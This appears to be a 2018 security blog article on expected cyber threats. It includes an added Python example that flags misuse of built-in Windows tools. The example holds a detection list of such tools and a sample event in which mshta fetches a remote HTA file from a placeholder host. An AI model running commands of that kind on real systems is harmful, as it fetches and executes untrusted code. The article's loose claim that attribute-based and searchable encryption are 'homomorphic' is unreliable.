Five cyber threats you should look out for in 2018
1. Attacks on supply chains
In 2017 we saw most vendors getting hacked, with legitimate code changed to contain backdoors or other types of unwanted behaviour. In several cases, the modified code was even cryptographically signed with the company’s certificate.
This type of attack where dependencies on our suppliers are exploited is probably just the tip of the iceberg. CloudHopper was not particularly advanced but it was effective in exploiting people by getting administrators to click on attachments containing malicious code.
When did you last look to see whether your computer or server might contain a hardware backdoor put there during delivery from the manufacturer? Are binaries automatically updated from your provider?
2. IoT - connected devices and critical infrastructure
As digitalisation spreads and more and more products and systems are connected, the ability of a malicious operator to influence these connected devices is also increasing. This can range from a connected refrigerator to critical systems that can be indirectly affected by cyber attacks against locks, electrical supplies, telephony etc.
3. The election
Most people will be aware that there is a general election in Sweden this year. With more and more alternative news sources and ‘fake news’, cyber attacks will be one of several channels for reinforcing a narrative. We will probably see information thefts where the content can be used to strengthen or weaken a party at a strategic time.
4. ‘Living off the land’
Why should the attacker introduce new binaries or malware into a system when it is possible to exploit existing functionality to create backdoors or e.g. filter information? ‘Living off the land’ is a concept whereby the attacker can use things that are already installed in the basic Windows system. As more and more users use whitelisting, this becomes a way for the attacker to bypass the whitelists and avoid triggering antivirus software.
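As an added illustration (not part of the original article): a small Python triage over constructed process-creation events, showing why a path-based whitelist permits every event while parent-process and command-line checks still flag misuse of built-in tools. The tool lists, event fields and sample events are assumptions chosen for this example and are not exhaustive.

```python
import re
from ntpath import basename  # parses Windows paths on any platform

# Built-in Windows tools that can run scripts or fetch content (illustrative list).
BUILTIN_TOOLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                 "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# Document applications that rarely have a reason to launch those tools.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def allowlist_permits(event):
    """Path-based whitelist (assumed policy): anything under C:\\Windows\\ may run."""
    return event["image"].lower().startswith("c:\\windows\\")

def lotl_findings(event):
    """Return the reasons a process-creation event looks like built-in tool misuse."""
    image = basename(event["image"]).lower()
    parent = basename(event["parent"]).lower()
    reasons = []
    if image in BUILTIN_TOOLS:
        if parent in DOCUMENT_APPS:
            reasons.append(f"{parent} spawned {image}")
        if REMOTE_URL.search(event["cmdline"]):
            reasons.append(f"{image} given a remote URL")
    return reasons

def triage(events):
    """Pair each event id with the whitelist verdict and the behavioural findings."""
    return [(e["id"], allowlist_permits(e), lotl_findings(e)) for e in events]

# Constructed sample events (not taken from any real incident).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"id": 2, "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File invoice.ps1"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/page.hta"},
]

if __name__ == "__main__":
    for event_id, allowed, reasons in triage(SAMPLE_EVENTS):
        verdict = "permit" if allowed else "block"
        print(event_id, "whitelist:", verdict, "| findings:", reasons or "none")
```

All three events pass the whitelist because the binaries are legitimate and sit in the system directory; only the second and third are flagged, and only because of who launched the tool or what it was asked to load.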
Within the crypto area, we will see an increase in systems utilising encryption and end-to-end processes. But attackers too are getting better at exploiting cryptographic functions and making it harder for us to investigate malware.
With homomorphic systems such as attribute-based encryption and searchable encryption, storing information in cloud services will be more secure without the cloud service provider being able to view the content.
Organisations need to get better at practising and displaying risk-awareness. This applies not only to management teams but to the entire organisation. What do you do when the ‘shit hits the fan’ (if you’ll pardon the expression)? You need an answer not only because you have to have an action plan for the GDPR, NIS and other laws that are coming, but because it is only a matter of time before something happens and you are forced to act. So make it easier for yourself - allocate one day per year for different types of exercise.